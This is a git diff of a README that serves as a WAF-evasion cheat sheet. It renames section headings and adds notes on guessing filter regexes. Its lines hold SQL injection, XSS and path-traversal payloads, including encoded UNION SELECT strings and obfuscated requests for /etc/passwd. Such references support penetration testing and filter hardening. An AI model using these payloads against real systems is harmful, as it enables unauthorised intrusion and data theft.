diff --git a/README.md b/README.md index 0ff7b6e..067103d 100644 --- a/README.md +++ b/README.md @@ -2233,7 +2233,7 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: - This method often fails. - Many a times your IP will be blocked (temporarily/permanently). -### Regex-Reversing: +### Regex Reversing: #### Method: - Most efficient method of bypassing WAFs. - Some WAFs rely upon matching the attack payloads with the signatures in their databases. @@ -2241,12 +2241,16 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: #### Techniques: -### Keyword Filter Detection/Bypass +### Blacklisting Detection/Bypass + +- In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted. +- The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords. __Case__: SQL Injection ##### • Step 1: __Keywords Filtered__: `and`, `or`, `union` +__Probable Regex__: `preg_match('/(and|or|union)/i', $id)` - __Blocked Attempt__: `union select user, password from users` - __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'` @@ -2320,7 +2324,7 @@ __Bypassed__: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F` __Blocked__: `uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)` __Bypassed__: `uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29` -__3. Unicode Encoding__ +__3. Unicode Normalization__ - ASCII characters in unicode encoding encoding provide great variants for bypassing. - You can encode entire/part of the payload for obtaining results. @@ -2330,10 +2334,14 @@ __Obfuscated__: `` __Blocked__: `/?redir=http://google.com` __Bypassed__: `/?redir=http://google。com` (Unicode alternative) +__Blocked__: `x` +__Bypassed__: `<marquee loop=1 onfinish=alert︵1)>x` (Unicode alternative) +> __TIP:__ Have a look at [this](https://hackerone.com/reports/231444) and [this](https://hackerone.com/reports/231389) reports on HackerOne. :) + __Standard__: `../../etc/passwd` __Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd` -__4. HTML Encoding__ +__4. HTML Representation__ - Often web apps encode special characters into HTML encoding and render them accordingly. - This leads us to basic bypass cases with HTML encoding (numeric/generic). @@ -2372,7 +2380,7 @@ __Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/ __Standard__: `` __Obfuscated__: `%253Cscript%253Ealert()%253C%252Fscript%253E` -__8. Wildcard Encoding__ +__8. Wildcard Obfuscation__ - Globbing patterns are used by various command-line utilities to work with multiple files. - We can tweak them to execute system commands. - Specific to remote code execution vulnerabilities on linux systems. @@ -2423,7 +2431,7 @@ __Obfuscated__: `